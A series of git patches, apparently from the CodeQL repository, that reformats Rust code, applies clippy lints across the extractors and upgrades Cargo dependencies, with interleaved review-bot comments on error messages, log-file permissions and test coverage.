--- a/rust/extractor/macros/src/lib.rs +++ b/rust/extractor/macros/src/lib.rs @@ -96,7 +96,7 @@ pub fn extractor_cli_config(_attr: TokenStream, item: TokenStream) -> TokenStrea }) .collect::>(); - let gen = quote! { + let ret = quote! { #[serde_with::apply(_ => #[serde(default)])] #[derive(Deserialize, Default)] pub struct #name { @@ -118,5 +118,5 @@ pub fn extractor_cli_config(_attr: TokenStream, item: TokenStream) -> TokenStrea #(#cli_fields),* } }; - gen.into() + ret.into() } From 6089a7526288bd0c6c6d41c203c2f2f26eb1323e Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:19:03 +0100 Subject: [PATCH 027/892] Rust/Ruby/Python: format code --- python/extractor/tsg-python/src/main.rs | 12 ++++++------ rust/extractor/src/config.rs | 2 +- rust/extractor/src/config/deserialize.rs | 2 +- rust/extractor/src/diagnostics.rs | 2 +- rust/extractor/src/main.rs | 4 ++-- rust/extractor/src/rust_analyzer.rs | 2 +- rust/extractor/src/translate/base.rs | 10 +++++----- rust/extractor/src/translate/mappings.rs | 2 +- shared/tree-sitter-extractor/src/extractor/mod.rs | 12 ++++-------- .../tree-sitter-extractor/tests/integration_test.rs | 2 +- .../tests/multiple_languages.rs | 2 +- 11 files changed, 24 insertions(+), 28 deletions(-) diff --git a/python/extractor/tsg-python/src/main.rs b/python/extractor/tsg-python/src/main.rs index 942d36088538..c111ef194ead 100644 --- a/python/extractor/tsg-python/src/main.rs +++ b/python/extractor/tsg-python/src/main.rs 
@@ -7,17 +7,17 @@ use std::path::Path; -use anyhow::anyhow; use anyhow::Context as _; use anyhow::Result; -use clap::{Command, Arg, ArgAction}; +use anyhow::anyhow; +use clap::{Arg, ArgAction, Command}; use tree_sitter::Parser; -use tree_sitter_graph::ast::File; -use tree_sitter_graph::functions::Functions; use tree_sitter_graph::ExecutionConfig; use tree_sitter_graph::Identifier; use tree_sitter_graph::NoCancellation; use tree_sitter_graph::Variables; +use tree_sitter_graph::ast::File; +use tree_sitter_graph::functions::Functions; const BUILD_VERSION: &'static str = env!("CARGO_PKG_VERSION"); @@ -332,7 +332,7 @@ pub mod extra_functions { return Err(ExecutionError::FunctionFailed( "unnamed-child-index".into(), format!("Cannot call child-index on the root node"), - )) + )); } }; let mut tree_cursor = parent.walk(); @@ -490,7 +490,7 @@ fn main() -> Result<()> { .short('t') .long("tsg") .action(ArgAction::Set) - .required(false) + .required(false), ) .arg(Arg::new("source").index(1).required(true)) .get_matches(); diff --git a/rust/extractor/src/config.rs b/rust/extractor/src/config.rs index c87af7e77280..24fef22cff08 100644 --- a/rust/extractor/src/config.rs +++ b/rust/extractor/src/config.rs @@ -4,9 +4,9 @@ use anyhow::Context; use clap::Parser; use codeql_extractor::trap; use figment::{ + Figment, providers::{Env, Format, Serialized, Yaml}, value::Value, - Figment, }; use itertools::Itertools; use ra_ap_cfg::{CfgAtom, CfgDiff}; diff --git a/rust/extractor/src/config/deserialize.rs b/rust/extractor/src/config/deserialize.rs index 5953acd86057..4f3d96897909 100644 --- a/rust/extractor/src/config/deserialize.rs +++ b/rust/extractor/src/config/deserialize.rs @@ -1,5 +1,5 @@ -use serde::de::{Error, Unexpected, Visitor}; use serde::Deserializer; +use serde::de::{Error, Unexpected, Visitor}; use std::collections::HashMap; use std::fmt::Formatter; use std::hash::BuildHasher; 
diff --git a/rust/extractor/src/diagnostics.rs b/rust/extractor/src/diagnostics.rs index d111975db7d5..a39706a0cf28 100644 --- a/rust/extractor/src/diagnostics.rs +++ b/rust/extractor/src/diagnostics.rs @@ -2,8 +2,8 @@ use crate::config::Config; use anyhow::Context; use chrono::{DateTime, Utc}; use ra_ap_project_model::ProjectManifest; -use serde::ser::SerializeMap; use serde::Serialize; +use serde::ser::SerializeMap; use std::collections::HashMap; use std::fmt::Display; use std::fs::File; diff --git a/rust/extractor/src/main.rs b/rust/extractor/src/main.rs index 48445a935c30..17bf43b91c6f 100644 --- a/rust/extractor/src/main.rs +++ b/rust/extractor/src/main.rs @@ -1,11 +1,11 @@ -use crate::diagnostics::{emit_extraction_diagnostics, ExtractionStep}; +use crate::diagnostics::{ExtractionStep, emit_extraction_diagnostics}; use crate::rust_analyzer::path_to_file_id; use crate::trap::TrapId; use anyhow::Context; use archive::Archiver; use ra_ap_hir::Semantics; -use ra_ap_ide_db::line_index::{LineCol, LineIndex}; use ra_ap_ide_db::RootDatabase; +use ra_ap_ide_db::line_index::{LineCol, LineIndex}; use ra_ap_load_cargo::LoadCargoConfig; use ra_ap_paths::{AbsPathBuf, Utf8PathBuf}; use ra_ap_project_model::{CargoConfig, ProjectManifest}; diff --git a/rust/extractor/src/rust_analyzer.rs b/rust/extractor/src/rust_analyzer.rs index 2ebbcac6b590..f0ca9a223207 100644 --- a/rust/extractor/src/rust_analyzer.rs +++ b/rust/extractor/src/rust_analyzer.rs @@ -2,7 +2,7 @@ use itertools::Itertools; use ra_ap_base_db::SourceDatabase; use ra_ap_hir::Semantics; use ra_ap_ide_db::RootDatabase; -use ra_ap_load_cargo::{load_workspace_at, LoadCargoConfig}; +use ra_ap_load_cargo::{LoadCargoConfig, load_workspace_at}; use ra_ap_paths::{AbsPath, Utf8PathBuf}; use ra_ap_project_model::ProjectManifest; use ra_ap_project_model::{CargoConfig, ManifestPath}; diff --git a/rust/extractor/src/translate/base.rs b/rust/extractor/src/translate/base.rs index 9c8e919e5aa0..6618feae4c20 100644 
--- a/rust/extractor/src/translate/base.rs +++ b/rust/extractor/src/translate/base.rs @@ -4,23 +4,23 @@ use crate::rust_analyzer::FileSemanticInformation; use crate::trap::{DiagnosticSeverity, TrapFile, TrapId}; use crate::trap::{Label, TrapClass}; use itertools::Either; -use ra_ap_base_db::ra_salsa::InternKey; use ra_ap_base_db::CrateOrigin; +use ra_ap_base_db::ra_salsa::InternKey; use ra_ap_hir::db::ExpandDatabase; use ra_ap_hir::{ Adt, Crate, ItemContainer, Module, ModuleDef, PathResolution, Semantics, Type, Variant, }; -use ra_ap_hir_def::type_ref::Mutability; use ra_ap_hir_def::ModuleId; +use ra_ap_hir_def::type_ref::Mutability; use ra_ap_hir_expand::ExpandTo; -use ra_ap_ide_db::line_index::{LineCol, LineIndex}; use ra_ap_ide_db::RootDatabase; +use ra_ap_ide_db::line_index::{LineCol, LineIndex}; use ra_ap_parser::SyntaxKind; use ra_ap_span::{EditionedFileId, TextSize}; use ra_ap_syntax::ast::HasName; use ra_ap_syntax::{ - ast, AstNode, NodeOrToken, SyntaxElementChildren, SyntaxError, SyntaxNode, SyntaxToken, - TextRange, + AstNode, NodeOrToken, SyntaxElementChildren, SyntaxError, SyntaxNode, SyntaxToken, TextRange, + ast, }; #[macro_export] diff --git a/rust/extractor/src/translate/mappings.rs b/rust/extractor/src/translate/mappings.rs index 6ad8a7d1df6f..3068e5cea52e 100644 --- a/rust/extractor/src/translate/mappings.rs +++ b/rust/extractor/src/translate/mappings.rs @@ -1,6 +1,6 @@ use ra_ap_hir::{Enum, Function, HasContainer, Module, Semantics, Struct, Trait, Union}; use ra_ap_ide_db::RootDatabase; -use ra_ap_syntax::{ast, ast::RangeItem, AstNode}; +use ra_ap_syntax::{AstNode, ast, ast::RangeItem}; pub(crate) trait TextValue { fn try_get_text(&self) -> Option; diff --git a/shared/tree-sitter-extractor/src/extractor/mod.rs b/shared/tree-sitter-extractor/src/extractor/mod.rs index fcefe87106cb..18a0cfc94520 100644 --- a/shared/tree-sitter-extractor/src/extractor/mod.rs +++ b/shared/tree-sitter-extractor/src/extractor/mod.rs 
@@ -7,13 +7,13 @@ use std::collections::BTreeSet as Set; use std::env; use std::path::Path; +use tracing_subscriber::EnvFilter; +use tracing_subscriber::Layer; use tracing_subscriber::filter::Filtered; use tracing_subscriber::fmt::format::DefaultFields; use tracing_subscriber::fmt::format::Format; use tracing_subscriber::layer::SubscriberExt; use tracing_subscriber::util::SubscriberInitExt; -use tracing_subscriber::EnvFilter; -use tracing_subscriber::Layer; use tree_sitter::{Language, Node, Parser, Range, Tree}; pub mod simple; @@ -591,11 +591,7 @@ impl<'a> Visitor<'a> { } } } - if is_valid { - Some(args) - } else { - None - } + if is_valid { Some(args) } else { None } } fn type_matches(&self, tp: &TypeName, type_info: &node_types::FieldTypeInfo) -> bool { @@ -615,7 +611,7 @@ impl<'a> Visitor<'a> { } node_types::FieldTypeInfo::ReservedWordInt(int_mapping) => { - return !tp.named && int_mapping.contains_key(&tp.kind) + return !tp.named && int_mapping.contains_key(&tp.kind); } } false diff --git a/shared/tree-sitter-extractor/tests/integration_test.rs b/shared/tree-sitter-extractor/tests/integration_test.rs index cc453eeef741..34d475df5d01 100644 --- a/shared/tree-sitter-extractor/tests/integration_test.rs +++ b/shared/tree-sitter-extractor/tests/integration_test.rs @@ -4,7 +4,7 @@ use codeql_extractor::trap; use tree_sitter_ql; mod common; -use common::{create_source_dir, expect_trap_file, SourceArchive}; +use common::{SourceArchive, create_source_dir, expect_trap_file}; /// A very simple happy-path test. /// We run the extractor using the tree-sitter-ql grammar and a single source file, diff --git a/shared/tree-sitter-extractor/tests/multiple_languages.rs b/shared/tree-sitter-extractor/tests/multiple_languages.rs index f14100f6e0c7..766de2bc7820 100644 --- a/shared/tree-sitter-extractor/tests/multiple_languages.rs +++ b/shared/tree-sitter-extractor/tests/multiple_languages.rs 
@@ -3,7 +3,7 @@ use codeql_extractor::trap; use tree_sitter_ql; mod common; -use common::{create_source_dir, expect_trap_file, SourceArchive}; +use common::{SourceArchive, create_source_dir, expect_trap_file}; /// Like the `simple_extractor` test but with multiple languages. /// This is in a separate crate because the simple extractor API sets up a From 1bcc6ddb3209c179e347e6368679f918faa2407b Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:21:28 +0100 Subject: [PATCH 028/892] Rust/Ruby/Python: apply clippy lints --- python/extractor/tsg-python/src/main.rs | 8 ++--- .../tsg-python/tsp/bindings/rust/build.rs | 4 +-- .../tsg-python/tsp/bindings/rust/lib.rs | 8 ++--- ruby/extractor/src/extractor.rs | 30 +++++++++---------- .../tree-sitter-extractor/src/diagnostics.rs | 2 +- .../src/generator/dbscheme.rs | 6 ++-- .../tree-sitter-extractor/src/generator/ql.rs | 16 +++++----- shared/tree-sitter-extractor/src/trap.rs | 12 ++++++-- .../tree-sitter-extractor/tests/common/mod.rs | 4 +-- .../tests/integration_test.rs | 1 - .../tests/multiple_languages.rs | 1 - 11 files changed, 48 insertions(+), 44 deletions(-) diff --git a/python/extractor/tsg-python/src/main.rs b/python/extractor/tsg-python/src/main.rs index c111ef194ead..6b72efdb6ef6 100644 --- a/python/extractor/tsg-python/src/main.rs +++ b/python/extractor/tsg-python/src/main.rs @@ -19,7 +19,7 @@ use tree_sitter_graph::Variables; use tree_sitter_graph::ast::File; use tree_sitter_graph::functions::Functions; -const BUILD_VERSION: &'static str = env!("CARGO_PKG_VERSION"); +const BUILD_VERSION: &str = env!("CARGO_PKG_VERSION"); pub mod extra_functions { use tree_sitter_graph::functions::{Function, Parameters}; @@ -331,7 +331,7 @@ pub mod extra_functions { None => { return Err(ExecutionError::FunctionFailed( "unnamed-child-index".into(), - format!("Cannot call child-index on the root node"), + "Cannot call child-index on the root node".to_string(), )); } }; 
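Review bot: The error text on the added line in the `@@ -331,7` hunk says `child-index`, while the function name passed as the first argument to `ExecutionError::FunctionFailed` is `unnamed-child-index`, so the same failure is reported under two different names. Since the line is being rewritten anyway, the message could match the function: `"Cannot call unnamed-child-index on the root node".to_string(),`. The next hunk (`@@ -342,7`) has the same mismatch in `"Called child-index on a non-named child"`. No caller or test that matches on the message text is visible here, but any that exists would need the same update. The enclosing function starts and ends outside the hunk.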
@@ -342,7 +342,7 @@ pub mod extra_functions { .ok_or_else(|| { ExecutionError::FunctionFailed( "unnamed-child-index".into(), - format!("Called child-index on a non-named child"), + "Called child-index on a non-named child".to_string(), ) })?; Ok(Value::Integer(index as u32)) @@ -400,7 +400,7 @@ pub mod extra_functions { let parent = node.parent().ok_or_else(|| { ExecutionError::FunctionFailed( "get-parent".into(), - format!("Cannot call get-parent on the root node"), + "Cannot call get-parent on the root node".to_string(), ) })?; Ok(Value::SyntaxNode(graph.add_syntax_node(parent))) diff --git a/python/extractor/tsg-python/tsp/bindings/rust/build.rs b/python/extractor/tsg-python/tsp/bindings/rust/build.rs index 4450166885e2..74c445ae32ee 100644 --- a/python/extractor/tsg-python/tsp/bindings/rust/build.rs +++ b/python/extractor/tsg-python/tsp/bindings/rust/build.rs @@ -5,7 +5,7 @@ fn main() { let src_dir = Path::new("src"); let mut c_config = cc::Build::new(); - c_config.include(&src_dir); + c_config.include(src_dir); c_config .flag_if_supported("-Wno-unused-parameter") .flag_if_supported("-Wno-unused-but-set-variable") @@ -17,7 +17,7 @@ fn main() { let mut cpp_config = cc::Build::new(); cpp_config.cpp(true); - cpp_config.include(&src_dir); + cpp_config.include(src_dir); cpp_config .flag_if_supported("-Wno-unused-parameter") .flag_if_supported("-Wno-unused-but-set-variable"); diff --git a/python/extractor/tsg-python/tsp/bindings/rust/lib.rs b/python/extractor/tsg-python/tsp/bindings/rust/lib.rs index 0d524b28d273..560277354f2a 100644 --- a/python/extractor/tsg-python/tsp/bindings/rust/lib.rs +++ b/python/extractor/tsg-python/tsp/bindings/rust/lib.rs 
@@ -43,18 +43,18 @@ pub fn language() -> Language { } /// The source of the Python tree-sitter grammar description. -pub const GRAMMAR: &'static str = include_str!("../../grammar.js"); +pub const GRAMMAR: &str = include_str!("../../grammar.js"); /// The syntax highlighting query for this language. -pub const HIGHLIGHT_QUERY: &'static str = include_str!("../../queries/highlights.scm"); +pub const HIGHLIGHT_QUERY: &str = include_str!("../../queries/highlights.scm"); /// The content of the [`node-types.json`][] file for this grammar. /// /// [`node-types.json`]: https://tree-sitter.github.io/tree-sitter/using-parsers#static-node-types -pub const NODE_TYPES: &'static str = include_str!("../../src/node-types.json"); +pub const NODE_TYPES: &str = include_str!("../../src/node-types.json"); /// The symbol tagging query for this language. -pub const TAGGING_QUERY: &'static str = include_str!("../../queries/tags.scm"); +pub const TAGGING_QUERY: &str = include_str!("../../queries/tags.scm"); #[cfg(test)] mod tests { diff --git a/ruby/extractor/src/extractor.rs b/ruby/extractor/src/extractor.rs index f1c272f17927..d42713122263 100644 --- a/ruby/extractor/src/extractor.rs +++ b/ruby/extractor/src/extractor.rs @@ -99,7 +99,7 @@ pub fn run(options: Options) -> std::io::Result<()> { let mut needs_conversion = false; let code_ranges; let mut trap_writer = trap::Writer::new(); - if path.extension().map_or(false, |x| x == "erb") { + if path.extension().is_some_and(|x| x == "erb") { tracing::info!("scanning: {}", path.display()); extractor::extract( &erb, 
@@ -371,59 +371,59 @@ fn test_scan_coding_comment() { assert_eq!(result, Some("utf-8".into())); let text = "#coding:utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); let text = "# foo\n# encoding: utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, None); let text = "# encoding: latin1 encoding: utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("latin1".into())); let text = "# encoding: nonsense"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("nonsense".into())); let text = "# coding = utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); let text = "# CODING = utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); let text = "# CoDiNg = utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); let text = "# blah blahblahcoding = utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); // unicode BOM is ignored let text = "\u{FEFF}# encoding: utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); let text = "\u{FEFF} # encoding: utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); let text = "#! 
/usr/bin/env ruby\n # encoding: utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); let text = "\u{FEFF}#! /usr/bin/env ruby\n # encoding: utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); // A #! must be the first thing on a line, otherwise it's a normal comment let text = " #! /usr/bin/env ruby encoding = utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, Some("utf-8".into())); let text = " #! /usr/bin/env ruby \n # encoding = utf-8"; - let result = scan_coding_comment(&text.as_bytes()); + let result = scan_coding_comment(text.as_bytes()); assert_eq!(result, None); } diff --git a/shared/tree-sitter-extractor/src/diagnostics.rs b/shared/tree-sitter-extractor/src/diagnostics.rs index f4d6d75a79c5..781a24797d5f 100644 --- a/shared/tree-sitter-extractor/src/diagnostics.rs +++ b/shared/tree-sitter-extractor/src/diagnostics.rs @@ -124,7 +124,7 @@ impl LogWriter { match std::fs::OpenOptions::new() .create(true) .append(true) - .write(true) + .open(path) { Err(e) => { diff --git a/shared/tree-sitter-extractor/src/generator/dbscheme.rs b/shared/tree-sitter-extractor/src/generator/dbscheme.rs index 67af94a4dab8..fd690f57a72f 100644 --- a/shared/tree-sitter-extractor/src/generator/dbscheme.rs +++ b/shared/tree-sitter-extractor/src/generator/dbscheme.rs @@ -48,7 +48,7 @@ pub enum DbColumnType { String, } -impl<'a> fmt::Display for Case<'a> { +impl fmt::Display for Case<'_> { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { writeln!(f, "case @{}.{} of", &self.name, &self.column)?; let mut sep = " "; 
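Review bot: The diagnostics log in `LogWriter` is still opened with `create(true)` and no explicit permissions, so a newly created file gets whatever mode the process umask allows, and an existing file or symlink at `path` is appended to as-is. Dropping `.write(true)` does not change this, because `.append(true)` already implies write access. If the log directory can be shared with other users, which cannot be told from this hunk, restricting the mode on Unix would be a cheap hardening step: `.mode(0o600)` via `std::os::unix::fs::OpenOptionsExt`, behind `#[cfg(unix)]`. A short comment above the builder chain saying that `path` is expected to be in an extractor-owned directory would also help. The `match` arms continue outside the hunk.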
@@ -60,7 +60,7 @@ impl<'a> fmt::Display for Case<'a> { } } -impl<'a> fmt::Display for Table<'a> { +impl fmt::Display for Table<'_> { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { if let Some(keyset) = &self.keysets { write!(f, "#keyset[")?; @@ -102,7 +102,7 @@ impl<'a> fmt::Display for Table<'a> { } } -impl<'a> fmt::Display for Union<'a> { +impl fmt::Display for Union<'_> { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { write!(f, "@{} = ", self.name)?; let mut first = true; diff --git a/shared/tree-sitter-extractor/src/generator/ql.rs b/shared/tree-sitter-extractor/src/generator/ql.rs index 5dfc2ec84069..8e899462ac39 100644 --- a/shared/tree-sitter-extractor/src/generator/ql.rs +++ b/shared/tree-sitter-extractor/src/generator/ql.rs @@ -8,7 +8,7 @@ pub enum TopLevel<'a> { Module(Module<'a>), } -impl<'a> fmt::Display for TopLevel<'a> { +impl fmt::Display for TopLevel<'_> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { TopLevel::Import(imp) => write!(f, "{}", imp), @@ -24,7 +24,7 @@ pub struct Import<'a> { pub alias: Option<&'a str>, } -impl<'a> fmt::Display for Import<'a> { +impl fmt::Display for Import<'_> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "import {}", &self.module)?; if let Some(name) = &self.alias { @@ -43,7 +43,7 @@ pub struct Class<'a> { pub predicates: Vec>, } -impl<'a> fmt::Display for Class<'a> { +impl fmt::Display for Class<'_> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { if let Some(qldoc) = &self.qldoc { write!(f, "/** {} */", qldoc)?; @@ -93,7 +93,7 @@ pub struct Module<'a> { pub body: Vec>, } -impl<'a> fmt::Display for Module<'a> { +impl fmt::Display for Module<'_> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { if let Some(qldoc) = &self.qldoc { write!(f, "/** {} */", qldoc)?; 
@@ -122,7 +122,7 @@ pub enum Type<'a> { Normal(&'a str), } -impl<'a> fmt::Display for Type<'a> { +impl fmt::Display for Type<'_> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { Type::Int => write!(f, "int"), @@ -152,7 +152,7 @@ pub enum Expression<'a> { }, } -impl<'a> fmt::Display for Expression<'a> { +impl fmt::Display for Expression<'_> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { Expression::Var(x) => write!(f, "{}", x), @@ -246,7 +246,7 @@ pub struct Predicate<'a> { pub body: Expression<'a>, } -impl<'a> fmt::Display for Predicate<'a> { +impl fmt::Display for Predicate<'_> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { if let Some(qldoc) = &self.qldoc { write!(f, "/** {} */", qldoc)?; @@ -280,7 +280,7 @@ pub struct FormalParameter<'a> { pub param_type: Type<'a>, } -impl<'a> fmt::Display for FormalParameter<'a> { +impl fmt::Display for FormalParameter<'_> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{} {}", self.param_type, self.name) } diff --git a/shared/tree-sitter-extractor/src/trap.rs b/shared/tree-sitter-extractor/src/trap.rs index 4c061f8dbd82..4ad1e48eb6ba 100644 --- a/shared/tree-sitter-extractor/src/trap.rs +++ b/shared/tree-sitter-extractor/src/trap.rs @@ -25,6 +25,12 @@ pub struct Writer { location_labels: std::collections::HashMap, } +impl Default for Writer { + fn default() -> Self { + Self::new() + } +} + impl Writer { pub fn new() -> Writer { Writer { @@ -306,9 +312,9 @@ impl Compression { #[test] fn limit_string_test() { - assert_eq!("hello", limit_string(&"hello world".to_owned(), 5)); - assert_eq!("hi ☹", limit_string(&"hi ☹☹".to_owned(), 6)); - assert_eq!("hi ", limit_string(&"hi ☹☹".to_owned(), 5)); + assert_eq!("hello", limit_string("hello world", 5)); + assert_eq!("hi ☹", limit_string("hi ☹☹", 6)); + assert_eq!("hi ", limit_string("hi ☹☹", 5)); } #[test] 
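Review bot: All three assertions in `limit_string_test` use an input longer than the limit, so nothing pins the case where the string already fits. The existing cases cover truncation, including backing off to a character boundary for the multi-byte `☹`. One more line would cover the no-op path: `assert_eq!("hi", limit_string("hi", 5));`, assuming `limit_string` returns the input unchanged when it fits. `limit_string` itself is defined outside this hunk, so that expectation should be checked against its body.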
diff --git a/shared/tree-sitter-extractor/tests/common/mod.rs b/shared/tree-sitter-extractor/tests/common/mod.rs index f60f575a0a27..9871ae401c05 100644 --- a/shared/tree-sitter-extractor/tests/common/mod.rs +++ b/shared/tree-sitter-extractor/tests/common/mod.rs @@ -28,7 +28,7 @@ pub fn create_source_dir(files: Vec<(&'static str, &'static str)>) -> SourceArch let path = source_archive_dir.join(filename); let mut file = File::create(&path).unwrap(); file.write_all(contents.as_bytes()).unwrap(); - file_paths.push(PathBuf::from(path)); + file_paths.push(path); } let file_list = { @@ -69,5 +69,5 @@ pub fn expect_trap_file(root_dir: &Path, filename: &str) { fn create_dir(root: &Path, path: impl AsRef) -> PathBuf { let full_path = root.join(path); std::fs::create_dir_all(&full_path).expect("Failed to create directory"); - full_path.into() + full_path } diff --git a/shared/tree-sitter-extractor/tests/integration_test.rs b/shared/tree-sitter-extractor/tests/integration_test.rs index 34d475df5d01..7a6b4945d5d2 100644 --- a/shared/tree-sitter-extractor/tests/integration_test.rs +++ b/shared/tree-sitter-extractor/tests/integration_test.rs @@ -1,7 +1,6 @@ use codeql_extractor::extractor::simple; use codeql_extractor::trap; -use tree_sitter_ql; mod common; use common::{SourceArchive, create_source_dir, expect_trap_file}; diff --git a/shared/tree-sitter-extractor/tests/multiple_languages.rs b/shared/tree-sitter-extractor/tests/multiple_languages.rs index 766de2bc7820..2e45e56754a3 100644 --- a/shared/tree-sitter-extractor/tests/multiple_languages.rs +++ b/shared/tree-sitter-extractor/tests/multiple_languages.rs @@ -1,6 +1,5 @@ use codeql_extractor::extractor::simple; use codeql_extractor::trap; -use tree_sitter_ql; mod common; use common::{SourceArchive, create_source_dir, expect_trap_file}; From d2105a75284b2c578a14cd40d88846b57f24eb26 Mon Sep 17 00:00:00 2001 
From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:29:42 +0100 Subject: [PATCH 029/892] Shared: format code again --- shared/tree-sitter-extractor/src/diagnostics.rs | 1 - shared/tree-sitter-extractor/tests/integration_test.rs | 1 - 2 files changed, 2 deletions(-) diff --git a/shared/tree-sitter-extractor/src/diagnostics.rs b/shared/tree-sitter-extractor/src/diagnostics.rs index 781a24797d5f..3c41b85425e7 100644 --- a/shared/tree-sitter-extractor/src/diagnostics.rs +++ b/shared/tree-sitter-extractor/src/diagnostics.rs @@ -124,7 +124,6 @@ impl LogWriter { match std::fs::OpenOptions::new() .create(true) .append(true) - .open(path) { Err(e) => { diff --git a/shared/tree-sitter-extractor/tests/integration_test.rs b/shared/tree-sitter-extractor/tests/integration_test.rs index 7a6b4945d5d2..2b243ff7945b 100644 --- a/shared/tree-sitter-extractor/tests/integration_test.rs +++ b/shared/tree-sitter-extractor/tests/integration_test.rs @@ -1,7 +1,6 @@ use codeql_extractor::extractor::simple; use codeql_extractor::trap; - mod common; use common::{SourceArchive, create_source_dir, expect_trap_file}; From 83e442a2667db742beae6bca80b9ed223159fc2f Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:23:49 +0100 Subject: [PATCH 030/892] Rust/Ruby: run `cargo upgrade --incompatible --pinned` --- Cargo.lock | 435 +++++++++++++----------- rust/ast-generator/Cargo.toml | 8 +- rust/extractor/Cargo.toml | 38 +-- rust/extractor/macros/Cargo.toml | 2 +- shared/tree-sitter-extractor/Cargo.toml | 4 +- 5 files changed, 268 insertions(+), 219 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 48aa23d25ea3..fc646d201d66 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -1,6 +1,6 @@ # This file is automatically @generated by Cargo. # It is not intended for manual editing. -version = 3 +version = 4 [[package]] name = "adler2" 
@@ -82,19 +82,20 @@ dependencies = [ [[package]] name = "anstyle-wincon" -version = "3.0.6" +version = "3.0.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2109dbce0e72be3ec00bed26e6a7479ca384ad226efdd66db8fa2e3a38c83125" +checksum = "ca3534e77181a9cc07539ad51f2141fe32f6c3ffd4df76db8ad92346b003ae4e" dependencies = [ "anstyle", + "once_cell", "windows-sys 0.59.0", ] [[package]] name = "anyhow" -version = "1.0.95" +version = "1.0.96" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "34ac096ce696dc2fcabef30516bb13c0a68a11d30131d3df6f04711467681b04" +checksum = "6b964d184e89d9b6b67dd2715bc8e74cf3107fb2b529990c90cf517326150bf4" [[package]] name = "argfile" @@ -156,9 +157,9 @@ checksum = "bef38d45163c2f1dde094a7dfd33ccf595c92905c8f8f4fdc18d06fb1037718a" [[package]] name = "bitflags" -version = "2.7.0" +version = "2.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1be3f42a67d6d345ecd59f675f3f012d6974981560836e938c22b424b85ce1be" +checksum = "8f68f53c83ab957f72c32642f3868eec03eb974d1fb82e453128456482613d36" [[package]] name = "borsh" @@ -252,9 +253,9 @@ checksum = "613afe47fcd5fac7ccf1db93babcb082c5994d996f20b8b159f2ad1658eb5724" [[package]] name = "chalk-derive" -version = "0.98.0" +version = "0.99.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9426c8fd0fe61c3da880b801d3b510524df17843a8f9ec1f5b9cec24fb7412df" +checksum = "572583d9b97f9d277e5c7607f8239a30e2e04d3ed3b47c87d1cb2152ae724073" dependencies = [ "proc-macro2", "quote", 
@@ -264,19 +265,19 @@ dependencies = [ [[package]] name = "chalk-ir" -version = "0.98.0" +version = "0.99.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d5f2eb1cd6054da221bd1ac0197fb2fe5e2caf3dcb93619398fc1433f8f09093" +checksum = "e60e0ef9c81dce1336a9ed3c76f08775f5b623151d96d85ba45f7b10de76d1c7" dependencies = [ - "bitflags 2.7.0", + "bitflags 2.8.0", "chalk-derive", ] [[package]] name = "chalk-recursive" -version = "0.98.0" +version = "0.99.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "129dc03458f71cfb9c3cd621c9c68166a94e87b85b16ccd29af015d7ff9a1c61" +checksum = "5a06350d614e22b03a69b8105e3541614450a7ea48bc58ecc6c6bd92731a3995" dependencies = [ "chalk-derive", "chalk-ir", @@ -287,9 +288,9 @@ dependencies = [ [[package]] name = "chalk-solve" -version = "0.98.0" +version = "0.99.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d7e8a8c1e928f98cdf227b868416ef21dcd8cc3c61b347576d783713444d41c8" +checksum = "0e428761e9b55bee516bfe2457caed8b6d1b86353f92ae825bbe438a36ce91e8" dependencies = [ "chalk-derive", "chalk-ir", @@ -318,9 +319,9 @@ dependencies = [ [[package]] name = "clap" -version = 